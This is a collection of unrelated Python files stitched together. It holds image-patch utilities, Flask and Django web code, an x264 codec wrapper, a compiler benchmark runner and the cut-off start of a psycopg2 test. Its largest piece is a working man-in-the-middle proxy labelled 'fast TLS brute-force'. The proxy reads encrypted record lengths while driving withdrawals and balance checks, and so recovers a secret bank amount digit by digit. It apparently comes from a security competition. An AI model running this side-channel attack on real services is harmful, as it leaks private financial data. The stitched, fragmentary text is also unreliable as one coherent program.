    n_total = flat.shape[1]
    n_sampled = np.count_nonzero(flat)
    return n_total / n_sampled
# ------------ save as png image
def save_as_png(im_orig, filename):
    """Rescale an image to the full uint8 range and save it as <filename>.png."""
    shifted = im_orig - im_orig.min()
    rescaled = (255.0 / im_orig.max() * shifted).astype(np.uint8)
    out_path = filename + '.png'
    Image.fromarray(rescaled).save(out_path)
# ------------------- extract block ---------------------------------
def extract_block(im, block_asp_ratio_x, block_asp_ratio_y, x_margin, y_margin):
    """Extract a random block (patch) from a 2D image, avoiding empty areas.

    inputs:
        im - 2D image array
        block_asp_ratio_x, block_asp_ratio_y - block size as a fraction of the
            image size along each axis
        x_margin, y_margin - minimal top-left offset from the image border
    returns:
        im_block - the extracted block
    """
    NX = im.shape[0]
    NY = im.shape[1]
    NX_block = int(block_asp_ratio_x * NX)
    NY_block = int(block_asp_ratio_y * NY)
    # largest allowed top-left offset; the extra 25 keeps the block away
    # from the far border
    x_max_offset = NX - NX_block - x_margin - 25
    y_max_offset = NY - NY_block - y_margin - 25
    # messages fixed: each assert now names the margin it actually compares
    assert x_max_offset > x_margin, 'x_max_offset<x_margin'
    assert y_max_offset > y_margin, 'y_max_offset<y_margin'

    # Next we extract a block from the image and check that it contains some
    # signal, i.e. that it's not empty. If the block is "empty" (i.e. contains
    # mostly noise) we will try to extract another block. Max 50 trials.
    # If after 50 trials the block is still not good we'll store it anyway.
    valid_block_flag = 0
    trial_cnt = 0
    # logical `and` (short-circuit) instead of bitwise `&` on booleans
    while valid_block_flag == 0 and trial_cnt <= 50:
        trial_cnt += 1
        x_i = np.random.randint(x_margin, x_max_offset, size=1)  # offset in x axis
        y_i = np.random.randint(y_margin, y_max_offset, size=1)  # offset in y axis
        im_block = im[x_i[0]:(x_i[0] + NX_block), y_i[0]:(y_i[0] + NY_block)]
        # a block is "good" if its peak is at least half the image peak
        if np.max(np.abs(im_block)) > 0.5 * np.max(np.abs(im)):
            valid_block_flag = 1
        else:
            print('block contains mostly noise - not good - extract a different one')
    return im_block
#!/usr/bin/env python3
import socket
import argparse
import threading
import signal
import json
import requests
import sys
import time
import traceback
from queue import Queue
from contextlib import contextmanager
# Direction tags passed to worker()/mitm(): which way the proxied bytes flow.
CLIENT2SERVER = 1
SERVER2CLIENT = 2
# Global run flag; cleared by signal_handler() so every loop winds down.
running = True
"""
"fast" TLS brute-force
@author: <NAME>
"""
# Record lengths (in bytes) observed on the TLS stream: a record of
# MESSAGE_MARK bytes resets the per-response counter in mitm(), and a
# response of ERROR_MARK bytes is treated as an error reply -- presumably
# calibrated against the target server; confirm with captured traffic.
MESSAGE_MARK = 1359
ERROR_MARK = 55
# Index of the record within a response sequence whose length is inspected.
MESSAGE_ORDER = 3
# Fixed field widths for amounts, card-file names and account names.
MAX_AMOUNT_LEN = 9
MAX_FILE_LENGTH = 4
MAX_ACCOUNT_LENGTH = 4
# JSON templates for the commands POSTed to the command server.  The %IM_*%
# placeholders are substituted in send_command(); %PORT%/%IP% (and the
# %AMOUNT% left in the "new" command) are presumably filled in downstream
# by the command server -- TODO confirm.
NEW_COMMAND_FORMAT = '{ "type": "input",' \
                     ' "input":{"input": ["-p","%PORT%","-i","%IP%",' \
                     '"-c","%IM_FILE%","-a","%IM_ACCOUNT%","-n","%IM_AMOUNT%"],"base64": false}}'
DEPOSIT_COMMAND_FORMAT = '{ "type": "input",' \
                         ' "input":{"input": ["-p","%PORT%","-i","%IP%",' \
                         '"-c","%IM_FILE%","-a","%IM_ACCOUNT%","-d","%IM_AMOUNT%"],"base64": false}}'
WITHDRAW_COMMAND_FORMAT = '{ "type": "input",' \
                          ' "input":{"input": ["-p","%PORT%","-i","%IP%",' \
                          '"-c","%IM_FILE%","-a","%IM_ACCOUNT%","-w","%IM_AMOUNT%"],"base64": false}}'
BALANCE_COMMAND_FORMAT = '{ "type": "input",' \
                         ' "input":{"input": ["-p","%PORT%","-i","%IP%",' \
                         '"-c","%IM_FILE%","-a","%IM_ACCOUNT%","-g"],"base64": false}}'
# Brute-force progress: digits recovered so far and the digit being probed.
amount_detected = ''
cur_amount_len = 0
next_digit = 0
last_digit = False
# Monotonic counters used to derive fresh card-file / account names.
cur_file = 0
cur_file_name = None
cur_account = 0
cur_account_name = None
# 0: init (creating account)
# 1: sent acc created, 2: sent init withdraw (checking balance)
# 3: make withdraw/deposit
# 4: check balance
# 5: failed, 6: finished
cur_state = 0
# Reference response length captured while checking the balance, and the
# position of the current record within a response sequence.
cur_length = 0
cur_message = 0
def log(m):
    """Write a diagnostic message (plus newline) to stderr."""
    sys.stderr.write(str(m) + "\n")
def send_command(shared):
    """Build the next bank-client command for the current brute-force state.

    The JSON command is parsed into a dict and pushed onto `shared`, from
    where send_input() POSTs it to the command server.  States (see the
    table next to `cur_state` above): 0 creates a fresh card file/account,
    1 probes with a withdraw of the digits found so far, 2 asks for the
    balance, 3 issues a withdraw/deposit trial step, 4 re-checks the
    balance; anything else terminates with a "done" command.
    """
    global cur_state
    global cur_length
    global amount_detected
    global cur_amount_len
    global next_digit
    global last_digit
    global cur_file
    global cur_file_name
    global cur_account
    global cur_account_name
    try:
        if cur_state == 0:
            # start a new round: reset the probe and derive fresh zero-padded
            # card-file and account names from the monotonic counters
            cur_length = float("inf")
            next_digit = 0
            cur_file += 1
            cur_file_name = str(cur_file).zfill(MAX_FILE_LENGTH)
            cur_account += 1
            cur_account_name = str(cur_account).zfill(MAX_ACCOUNT_LENGTH)
            # the amount placeholder is left as %AMOUNT% -- presumably filled
            # in by the command server; TODO confirm
            json_command = NEW_COMMAND_FORMAT.replace('%IM_FILE%', cur_file_name) \
                .replace('%IM_ACCOUNT%', cur_account_name).replace('%IM_AMOUNT%', '%AMOUNT%')
            log("[MITM]: found so far: %s" % amount_detected)
            log("[MITM]: sending new: %s" % json_command)
        elif cur_state == 1 and cur_amount_len > 0:
            # withdraw the digits recovered so far, zero-padded to full width
            amount = amount_detected + str('').zfill(MAX_AMOUNT_LEN - cur_amount_len) + '.00'
            json_command = WITHDRAW_COMMAND_FORMAT.replace('%IM_FILE%', cur_file_name) \
                .replace('%IM_ACCOUNT%', cur_account_name).replace('%IM_AMOUNT%', amount)
            log("[MITM]: found so far: %s" % amount_detected)
            log("[MITM]: sending wit: %s" % json_command)
        elif cur_state == 2 or (cur_state == 1 and cur_amount_len == 0):
            # ask for the balance to capture a reference response length
            cur_state = 2
            json_command = BALANCE_COMMAND_FORMAT.replace('%IM_FILE%', cur_file_name) \
                .replace('%IM_ACCOUNT%', cur_account_name)
            log("[MITM]: found so far: %s -- current length: %d"
                % (amount_detected, cur_length if cur_length != float('inf') else -1))
            log("[MITM]: sending bal: %s" % json_command)
        elif cur_state == 3:
            if next_digit >= 10:
                # exhausted all ten candidate digits without a detectable change
                cur_state = 6
                log("[MITM] failed to brute-force")
                json_command = '{"type": "done"}'
            else:
                # probe amount: a single '1' followed by zero padding at the
                # digit position currently being tested
                amount = '1' + str('').zfill(MAX_AMOUNT_LEN - cur_amount_len - 1) + '.00'
                if last_digit:
                    # final digit is probed with deposits instead of withdrawals
                    json_command = DEPOSIT_COMMAND_FORMAT.replace('%IM_FILE%', cur_file_name) \
                        .replace('%IM_ACCOUNT%', cur_account_name).replace('%IM_AMOUNT%', amount)
                    next_digit += 1
                    log("[MITM]: found so far: %s -- current length: %d -- current digit: %d"
                        % (amount_detected, cur_length if cur_length != float('inf') else -1, next_digit))
                    log("[MITM]: sending dep - step: %s" % json_command)
                else:
                    json_command = WITHDRAW_COMMAND_FORMAT.replace('%IM_FILE%', cur_file_name) \
                        .replace('%IM_ACCOUNT%', cur_account_name).replace('%IM_AMOUNT%', amount)
                    next_digit += 1
                    log("[MITM]: found so far: %s -- current length: %d -- current digit: %d"
                        % (amount_detected, cur_length if cur_length != float('inf') else -1, next_digit))
                    log("[MITM]: sending wit - step: %s" % json_command)
        elif cur_state == 4:
            # re-check the balance so mitm() can compare response lengths
            json_command = BALANCE_COMMAND_FORMAT.replace('%IM_FILE%', cur_file_name) \
                .replace('%IM_ACCOUNT%', cur_account_name)
            log("[MITM]: found so far: %s -- current length: %d -- current digit: %d"
                % (amount_detected, cur_length if cur_length != float('inf') else -1, next_digit))
            log("[MITM]: sending bal: %s" % json_command)
        else:
            # unknown/terminal state: tell the command server we are done
            json_command = '{"type": "done"}'
            log("[MITM]: invalid state")
        # send to command server
        command = json.loads(json_command)
        shared.put(command, block=True)
    except Exception:
        log(traceback.format_exc())
def mitm(buff, direction, shared):
    """Inspect one proxied buffer and drive the brute-force state machine.

    Only server->client traffic is examined; the observable here is the
    buffer length (the TLS payload itself stays opaque).  Returns `buff`
    unchanged so the proxy remains transparent to both endpoints.
    """
    global cur_message
    global cur_state
    global cur_length
    global amount_detected
    global cur_amount_len
    global next_digit
    global last_digit
    # hb = "".join("{:02x}".format(c) for c in buff)
    if direction == CLIENT2SERVER:
        # client->server records are not inspected
        # log("-> %d ->" % len(buff))
        pass
    elif direction == SERVER2CLIENT:
        try:
            # a record of MESSAGE_MARK bytes starts a new response sequence;
            # every other record advances the position counter
            if len(buff) == MESSAGE_MARK:
                cur_message = 0
            else:
                cur_message += 1
            # only the MESSAGE_ORDER-th record of a response is informative
            if cur_message == MESSAGE_ORDER:
                log("<- [%d] last digit = %s <-" % (len(buff), str(last_digit)))
                if cur_state == 0 or cur_state == 1:
                    # account created / probe acknowledged: advance and continue
                    cur_state += 1
                    send_command(shared)
                elif cur_state == 2:
                    # balance reply: record the reference response length
                    cur_length = len(buff)
                    cur_state = 3
                    send_command(shared)
                elif cur_state == 3:
                    if len(buff) == ERROR_MARK:
                        # the trial step failed outright: the probed digit is 0
                        digit_found = 0
                        log("[MITM] found next digit: %s" % str(digit_found))
                        amount_detected += str(digit_found)
                        cur_amount_len += 1
                        if cur_amount_len < MAX_AMOUNT_LEN:
                            # more digits to find: restart with a fresh account
                            next_digit = 0
                            cur_state = 0
                            if cur_amount_len == MAX_AMOUNT_LEN - 1:
                                last_digit = True
                            send_command(shared)
                        else:
                            # all digits recovered: report the secret and stop
                            log("[MITM] found amount: %s" % amount_detected)
                            cur_state = 4
                            finish = {"type": "learned", "variable": "amount", "secret": int(amount_detected)}
                            shared.put(finish, block=True)
                            time.sleep(1)
                            finish = {"type": "done"}
                            shared.put(finish, block=True)
                    else:
                        # trial step accepted: compare balances next
                        cur_state += 1
                        send_command(shared)
                elif cur_state == 4:
                    # balance after the trial step: a length change relative to
                    # the reference reveals the probed digit
                    if ((len(buff) < cur_length and not last_digit)
                            or (len(buff) > cur_length and last_digit)):
                        digit_found = (10 - next_digit) if last_digit else next_digit
                        log("[MITM] found next digit: %s" % str(digit_found))
                        amount_detected += str(digit_found)
                        cur_amount_len += 1
                        if cur_amount_len < MAX_AMOUNT_LEN:
                            next_digit = 0
                            cur_state = 0
                            if cur_amount_len == MAX_AMOUNT_LEN - 1:
                                last_digit = True
                            send_command(shared)
                        else:
                            log("[MITM] found amount: %s" % amount_detected)
                            cur_state = 4
                            finish = {"type": "learned", "variable": "amount", "secret": int(amount_detected)}
                            shared.put(finish, block=True)
                            time.sleep(1)
                            finish = {"type": "done"}
                            shared.put(finish, block=True)
                    else:
                        # no change: try the next candidate digit
                        cur_state = 3
                        send_command(shared)
            # log("<- %d [%d] <-" % (len(buff), cur_message))
        except Exception:
            log(traceback.format_exc())
    return buff
def ignored(*exceptions):
    """Context manager that silently suppresses the given exception types.

    Thin wrapper over the standard contextlib.suppress (which this function
    previously re-implemented by hand); kept so existing
    `with ignored(Exception):` call sites keep working.
    """
    from contextlib import suppress  # local import: file only imports contextmanager
    return suppress(*exceptions)
def kill_p(a, b):
    """Best-effort teardown of a proxied socket pair.

    Shuts down and closes `a` then `b`; the first error (e.g. an
    already-closed socket) silently aborts the remaining teardown,
    matching the single suppression scope around all four calls.
    """
    with ignored(Exception):
        for sock in (a, b):
            sock.shutdown(socket.SHUT_RDWR)
            sock.close()
    return
def worker(client, server, n, shared):
    """Pump bytes from `client` to `server`, passing each chunk through mitm().

    `n` is the direction tag (CLIENT2SERVER / SERVER2CLIENT) and `shared` is
    the queue mitm()/send_command() use to reach the command server.  Runs
    until the global `running` flag clears or either peer disconnects.
    """
    while running:
        b = ""
        with ignored(Exception):
            b = client.recv(4096)
        # empty read (or a recv error, which leaves b == ""): peer is gone
        if len(b) == 0:
            kill_p(client, server)
            return
        try:
            # observe the traffic; the original bytes are forwarded regardless
            b = mitm(b, n, shared)
        except Exception:
            pass
        try:
            server.send(b)
        except Exception:
            # forwarding failed: tear down both ends and stop this worker
            pass
            kill_p(client, server)
            return
    kill_p(client, server)
    return
def signal_handler(sn, sf):
    """Signal handler: clear the global run flag so every loop exits."""
    global running
    running = False
def do_proxy_main(port, remote_host, remote_port):
    """Accept clients on `port` and proxy each to remote_host:remote_port.

    Spawns one sender thread for the command-server queue plus a pair of
    worker threads per accepted connection, then joins everything once the
    run flag clears or the accept loop fails.
    """
    signal.signal(signal.SIGTERM, signal_handler)
    workers = []
    p = None
    try:
        shared = Queue()
        # NOTE(review): uses the module-global `args` (args.c/args.d) for the
        # command-server address instead of taking parameters -- this only
        # works when the module is run as a script.
        p = threading.Thread(target=send_input, args=(args.c, args.d, shared))
        p.start()
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind(("0.0.0.0", port))
        s.listen(1)
        # prime the state machine with the first command
        send_command(shared)
        while running:
            k, a = s.accept()
            v = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            v.connect((remote_host, remote_port))
            # one worker per direction, sharing the same socket pair
            t1 = threading.Thread(target=worker, args=(k, v, CLIENT2SERVER, shared))
            t2 = threading.Thread(target=worker, args=(v, k, SERVER2CLIENT, shared))
            t2.start()
            t1.start()
            workers.append((t1, t2, k, v))
    except Exception:
        pass
    # stop all loops, close every proxied pair and join the threads
    signal_handler(None, None)
    for t1, t2, k, v in workers:
        kill_p(k, v)
        t1.join()
        t2.join()
    p.join()
    return
def send_input(host, port, shared):
    """Drain command dicts from `shared` and POST them to the command server.

    The queue is polled with a short timeout so the loop can notice when the
    global `running` flag is cleared; timeouts and HTTP errors are ignored.
    """
    global running
    url = "http://" + host + ":" + str(port)
    while running:
        try:
            item = shared.get(block=True, timeout=0.01)
            time.sleep(0.01)
            reply = requests.post(url, data={'REQUEST': json.dumps(item)})
            log(reply.text)
        except Exception:
            # queue.Empty timeouts and request failures both land here
            pass
        time.sleep(0.01)
if __name__ == '__main__':
    # CLI: local listen port, target TLS server address, and the command
    # server used to drive the bank client.
    parser = argparse.ArgumentParser(description='Proxy')
    parser.add_argument('-p', type=int, default=4000, help="listen port")
    parser.add_argument('-s', type=str, default="127.0.0.1", help="server ip address")
    parser.add_argument('-q', type=int, default=3000, help="server port")
    parser.add_argument('-c', type=str, default="127.0.0.1", help="command server")
    parser.add_argument('-d', type=int, default=5000, help="command port")
    args = parser.parse_args()
    print("started")
    # flush so the start marker is visible immediately to any supervisor
    sys.stdout.flush()
    do_proxy_main(args.p, args.s, args.q)
|
<gh_stars>1-10
# -*- coding: utf-8 -*-
"""Admin models."""
import datetime as dt
from flask_login import UserMixin
from league.database import (Column, Model, SurrogatePK, db, reference_col,
relationship)
from league.extensions import bcrypt
class SiteSettings(SurrogatePK, Model):
    """Configuration data for the webapp, stored as key/value string pairs."""

    __tablename__ = 'site_settings'
    # Unique setting name.
    key = Column(db.String(80), unique=True, nullable=False)
    # Setting value, stored as a string.
    value = Column(db.String(80), nullable=False)

    def __init__(self, key, value, **kwargs):
        """Create instance."""
        db.Model.__init__(self, key=key, value=value, **kwargs)

    def __repr__(self):
        """Represent instance as a unique string."""
        return '<SiteSettings({key})>'.format(key=self.key)

    @classmethod
    def get_by_key(cls, key):
        """Get SiteSettings by key (None if absent)."""
        return cls.query.filter_by(key=key).first()

    @classmethod
    def get_all(cls):
        """Get all SiteSettings."""
        return cls.query.all()
class Role(SurrogatePK, Model):
    """A role for a user."""

    __tablename__ = 'roles'
    # Unique role name.
    name = Column(db.String(80), unique=True, nullable=False)
    # Owning user (optional); exposes `user.roles` via the backref.
    user_id = reference_col('users', nullable=True)
    user = relationship('User', backref='roles')

    def __init__(self, name, **kwargs):
        """Create instance."""
        db.Model.__init__(self, name=name, **kwargs)

    def __repr__(self):
        """Represent instance as a unique string."""
        return '<Role({name})>'.format(name=self.name)
class User(UserMixin, SurrogatePK, Model):
    """A user of the app."""

    __tablename__ = 'users'
    username = Column(db.String(80), unique=True, nullable=False)
    email = Column(db.String(80), unique=True, nullable=False)
    #: The hashed password
    password = Column(db.Binary(128), nullable=True)
    created_at = Column(db.DateTime, nullable=False, default=dt.datetime.utcnow)
    first_name = Column(db.String(30), nullable=True)
    last_name = Column(db.String(30), nullable=True)
    active = Column(db.Boolean(), default=False)
    is_admin = Column(db.Boolean(), default=False)

    def __init__(self, username, email, password=None, is_admin=False,
                 **kwargs):
        """Create instance.

        A user created without a password has none stored and cannot
        authenticate until one is set via set_password().
        """
        db.Model.__init__(self, username=username, email=email,
                          is_admin=is_admin, **kwargs)
        if password:
            self.set_password(password)
        else:
            self.password = None

    def set_password(self, password):
        """Hash the given password with bcrypt and store the digest."""
        self.password = bcrypt.generate_password_hash(password)

    def check_password(self, value):
        """Check a candidate password against the stored bcrypt hash."""
        return bcrypt.check_password_hash(self.password, value)

    @property
    def full_name(self):
        """Full user name."""
        return '{0} {1}'.format(self.first_name, self.last_name)

    def __repr__(self):
        """Represent instance as a unique string."""
        return '<User({username!r})>'.format(username=self.username)

    @classmethod
    def get_by_username(cls, username):
        """Get User by username (None if absent)."""
        return cls.query.filter_by(username=username).first()

    @classmethod
    def get_all(cls):
        """Get all users."""
        return cls.query.all()

    @classmethod
    def delete_by_id(cls, ids):
        """Delete users whose ids are in `ids` and commit."""
        cls.query.filter(User.id.in_(ids)).delete(synchronize_session=False)
        db.session.commit()
|
<reponame>rajanramprasadh/profiles-rest-api<filename>src/profiles_project/profiles_api/views.py
from django.shortcuts import render
from rest_framework import viewsets, status, filters
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.authentication import TokenAuthentication
from rest_framework.authtoken.serializers import AuthTokenSerializer
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.permissions import IsAuthenticatedOrReadOnly, IsAuthenticated
from . import serializers, models, permissions
# Create your views here.
class HelloApiView(APIView):
    """Test API View."""

    serializer_class = serializers.HelloSerializer

    def get(self, request, format=None):
        """Returns a list of APIView features."""
        # NOTE(review): typo 'yout' below is user-facing response data,
        # left unchanged here.
        an_api_view = [
            'Uses HTTP methods as function (get, post, patch, put, delete)',
            'It is similar to traditional Django View',
            'Gives you the most control over yout logic',
            'Is mapped manually to URLs'
        ]
        return Response({'message': 'Hello', 'an_api_view': an_api_view})

    def post(self, request):
        """Create a hello message with our name."""
        serializer = serializers.HelloSerializer(data=request.data)
        if serializer.is_valid():
            name = serializer.data.get('name')
            message = 'Hello {0}'.format(name)
            return Response({'message': message})
        else:
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)

    def put(self, request, pk=None):
        """Handles updating an object."""
        return Response({'method': 'put'})

    def patch(self, request, pk=None):
        """Patch request, only updates fields provided in the request."""
        return Response({'method': 'patch'})

    def delete(self, request, pk=None):
        """Deletes an object."""
        return Response({'method': 'delete'})
class HelloViewSet(viewsets.ViewSet):
    """Test API ViewSet demonstrating the standard ViewSet actions."""

    serializer_class = serializers.HelloSerializer

    def list(self, request):
        """Return a hello message."""
        a_viewset = [
            'Uses actions (list, create, retrieve, update, partial_update)',
            'Automatically maps to URLs using routers',
            'Provides more functionality with less code.'
        ]
        return Response({'message': 'Hello', 'a_viewset': a_viewset})

    def create(self, request):
        """Create a new hello message from the validated name."""
        serializer = serializers.HelloSerializer(data=request.data)
        if serializer.is_valid():
            name = serializer.data.get('name')
            message = 'Hello {0}'.format(name)
            return Response({'message': message})
        else:
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)

    def retrieve(self, request, pk=None):
        """Handles getting an object by its ID."""
        # was 'httpd_method': fixed to match the key the sibling actions use
        return Response({'http_method': 'GET'})

    def update(self, request, pk=None):
        """Handles updating an object."""
        return Response({'http_method': 'PUT'})

    def partial_update(self, request, pk=None):
        """Handles updating part of an object."""
        return Response({'http_method': 'PATCH'})

    def destroy(self, request, pk=None):
        """Handles removing an object."""
        return Response({'http_method': 'DELETE'})
class UserProfileViewSet(viewsets.ModelViewSet):
    """Handles creating, reading, updating profiles."""

    serializer_class = serializers.UserProfileSerializer
    queryset = models.UserProfile.objects.all()
    # Token auth; only the profile owner may modify their own profile.
    authentication_classes = (TokenAuthentication,)
    permission_classes = (permissions.UpdateOwnProfile,)
    # Allow ?search= queries over name and email.
    filter_backends = (filters.SearchFilter,)
    search_fields = ('name', 'email',)
class LoginViewSet(viewsets.ViewSet):
    """Checks email and password and returns an auth token."""

    serializer_class = AuthTokenSerializer

    def create(self, request):
        """Use the obtain-auth-token API view to validate and create a token."""
        return ObtainAuthToken().post(request)
class UserProfileFeedViewSet(viewsets.ModelViewSet):
    """Handles creating, reading and updating profile feed items."""

    authentication_classes = (TokenAuthentication,)
    serializer_class = serializers.ProfileFeedItemSerializer
    queryset = models.ProfileFeedItem.objects.all()
    # Authenticated users only; items are writable only by their owner.
    permission_classes = (permissions.PostOwnStatus, IsAuthenticated)

    def perform_create(self, serializer):
        """Sets the user profile to the logged-in user."""
        serializer.save(user_profile=self.request.user)
|
# Copyright 2014 Google.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""X264 codec definition.
This file defines how to run encode and decode for the x264 implementation
of H.264.
"""
import encoder
import file_codec
import subprocess
class X264Codec(file_codec.FileCodec):
    """Codec definition that encodes with the x264 CLI and decodes via ffmpeg."""

    def __init__(self, name='x264', formatter=None):
        super(X264Codec, self).__init__(
            name,
            formatter=(formatter or encoder.OptionFormatter(prefix='--', infix=' ')))
        self.extension = 'mkv'
        # The x264 option space explored when searching for good encodings.
        self.option_set = encoder.OptionSet(
            encoder.Option('preset', ['ultrafast', 'superfast', 'veryfast',
                                      'faster', 'fast', 'medium', 'slow', 'slower',
                                      'veryslow', 'placebo']),
            encoder.Option('rc-lookahead', ['0', '30', '60']),
            encoder.Option('vbv-init', ['0.5', '0.8', '0.9']),
            encoder.Option('ref', ['1', '2', '3', '16']),
            encoder.ChoiceOption(['use-vbv-maxrate']),
            encoder.Option('profile', ['baseline', 'main', 'high']),
            encoder.Option('tune', ['psnr', 'ssim']),
            # Experimentation on a 6-core, 12-thread system shows some gains on
            # large videos for thread values up to the thread count, and up to the
            # core count on smaller videos.
            # There is some damage to PSNR with more threads.
            encoder.IntegerOption('threads', 1, 6).Mandatory(),
            encoder.DummyOption('vbv-maxrate'),
            encoder.DummyOption('vbv-bufsize'),
        )

    def StartEncoder(self, context):
        """Return the default starting encoder configuration for a search."""
        return encoder.Encoder(context, encoder.OptionValueSet(
            self.option_set,
            '--preset slow --tune psnr --threads 1',
            formatter=self.option_formatter))

    def EncodeCommandLine(self, parameters, bitrate, videofile, encodedfile):
        """Build the x264 shell command encoding `videofile` at the given bitrate."""
        # The use-vbv-maxrate flag controls whether vbv-maxrate/vbv-bufsize
        # are used. They may be unneeded.
        # Still no opinion: '--no-scenecut --keyint infinite '
        if parameters.HasValue('use-vbv-maxrate'):
            parameters = parameters.RemoveValue('use-vbv-maxrate')
            parameters = parameters.ChangeValue('vbv-maxrate', str(bitrate))
            parameters = parameters.ChangeValue('vbv-bufsize', str(bitrate))
        commandline = ('%(x264)s '
                       '--bitrate %(bitrate)d --fps %(framerate)d '
                       '--input-res %(width)dx%(height)d '
                       '--quiet '
                       '%(parameters)s '
                       '-o %(outputfile)s %(inputfile)s') % {
                           'x264': encoder.Tool('x264'),
                           'bitrate': bitrate,
                           'framerate': videofile.framerate,
                           'width': videofile.width,
                           'height': videofile.height,
                           'outputfile': encodedfile,
                           'inputfile': videofile.filename,
                           'parameters': parameters.ToString()}
        return commandline

    def DecodeCommandLine(self, videofile, encodedfile, yuvfile):
        """Build the ffmpeg command decoding `encodedfile` to raw YUV."""
        commandline = '%s -loglevel error -i %s %s' % (encoder.Tool("ffmpeg"),
                                                       encodedfile, yuvfile)
        return commandline

    def ResultData(self, encodedfile):
        """Collect per-frame info from the encoded Matroska file."""
        more_results = {}
        more_results['frame'] = file_codec.MatroskaFrameInfo(encodedfile)
        return more_results

    def EncoderVersion(self):
        """Return the x264 version string (first line of `x264 --version`)."""
        # NOTE(review): on Python 3 check_output returns bytes, so splitting
        # on a str '\n' assumes Python 2 -- confirm the target runtime.
        version_output = subprocess.check_output([encoder.Tool('x264'),
                                                  '--version'])
        # The version is the first line of output.
        return version_output.split('\n')[0]
|
"""
Copyright 2021 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
from absl import app, flags, logging
from tqdm import tqdm
from optcache.essentials import IO
from optcache.essentials import Goals
from optcache.essentials import Engine
# Optimization levels evaluated for every benchmark (for both compilers).
flags.DEFINE_list('levels',
                  ['O0', 'O1', 'O2', 'O3', 'Os', 'Oz'],
                  'Compiler optimization levels')
def execute(argv):
    """Evaluate every benchmark at each optimization level and store reports."""
    del argv
    FLAGS = flags.FLAGS

    # The benchmarks to process
    benchmarks = IO.load_yaml(FLAGS.benchmarks_filename)
    if not benchmarks:
        logging.fatal('There are no benchmarks to process')

    # Create the results directory
    try:
        os.makedirs(FLAGS.results_directory)
    except FileExistsError:
        pass

    # Process each benchmark
    for benchmark in tqdm(benchmarks, desc='Processing'):
        # benchmark names look like "<suite>.<name>"
        dot = benchmark.find('.')
        suite_name = benchmark[:dot]
        bench_name = benchmark[dot + 1:]

        bench_in_dir = os.path.join(FLAGS.benchmarks_directory,
                                    suite_name,
                                    bench_name)
        if not os.path.isdir(bench_in_dir):
            continue

        bench_out_dir = os.path.join(FLAGS.results_directory,
                                     suite_name)
        # Create the results directory for the suite
        try:
            os.makedirs(bench_out_dir)
        except FileExistsError:
            pass

        filename = '{}/{}.yaml'.format(bench_out_dir, bench_name)
        # Skip benchmarks that already have a report, if requested
        if FLAGS.verify_report and os.path.isfile(filename):
            continue

        results = {}
        for compiler in ['opt', 'llvm']:
            for level in FLAGS.levels:
                goal_value = Engine.evaluate(
                    Goals.prepare_goals(FLAGS.goals, FLAGS.weights),
                    '-{}'.format(level),
                    compiler,
                    bench_in_dir,
                    FLAGS.working_set,
                    FLAGS.times,
                    FLAGS.tool,
                    FLAGS.verify_output
                )
                compiler_name = 'clang' if compiler == 'llvm' else 'opt'
                results.setdefault(compiler_name, {})[level] = {
                    'goal': goal_value,
                    'seq': ['-{}'.format(level)]
                }
        IO.dump_yaml(results, filename)
# Execute
# Execute
if __name__ == '__main__':
    # app: declare all command-line flags, then hand control to absl.
    flags.DEFINE_string('benchmarks_filename',
                        None,
                        'Benchmarks')
    flags.DEFINE_string('results_directory',
                        None,
                        'Results directory')
    flags.DEFINE_boolean('verify_report',
                         True,
                         'Do not process the benchmark if a report exists')
    flags.DEFINE_list('goals',
                      None,
                      'Goals')
    flags.DEFINE_list('weights',
                      None,
                      'Weights')
    flags.DEFINE_string('benchmarks_directory',
                        None,
                        'Benchmarks directory')
    flags.DEFINE_integer('working_set',
                         0,
                         'Working set',
                         lower_bound=0)
    flags.DEFINE_integer('times',
                         3,
                         'Execution/compile times',
                         lower_bound=3)
    flags.DEFINE_enum('tool',
                      'perf',
                      ['perf', 'hyperfine'],
                      'Execution tool')
    # NOTE(review): 'ouput' typo in the user-visible help string below.
    flags.DEFINE_boolean('verify_output',
                         False,
                         'The value of the goal is only valid if the ouput is correct')
    flags.mark_flag_as_required('goals')
    flags.mark_flag_as_required('weights')
    flags.mark_flag_as_required('benchmarks_filename')
    flags.mark_flag_as_required('benchmarks_directory')
    flags.mark_flag_as_required('results_directory')
    app.run(execute)
|
#!/usr/bin/env python
# test_copy.py - unit test for COPY support
#
# Copyright (C) 2010-2011 <NAME> <<EMAIL>>
#
# psycopg2 is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# In addition, as a special exception, the copyright holders give
# permission to link this program with the OpenSSL library (or with
# modified versions of OpenSSL that use the same license as OpenSSL),
# and distribute linked combinations including the two.
#
# You must obey the GNU Lesser General Public License in all respects for
# all of the code used other than OpenSSL.
#
# psycopg2 is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details.
import sys
import string
from .testutils import (unittest, ConnectingTestCase, decorate_all_tests,
skip_if_no_iobase, skip_before_postgres, slow)
from io import StringIO
from itertools import cycle
from subprocess import Popen, PIPE
import psycopg2
import psycopg2.extensions
from .testutils import skip_copy_if_green, script_to_py3
from .testconfig import dsn
# Base class for the Minimal* wrappers below: plain object on Python 2,
# TextIOBase on Python 3 -- presumably so psycopg2's copy machinery treats
# the wrapper as a text-mode file; TODO confirm against psycopg2 internals.
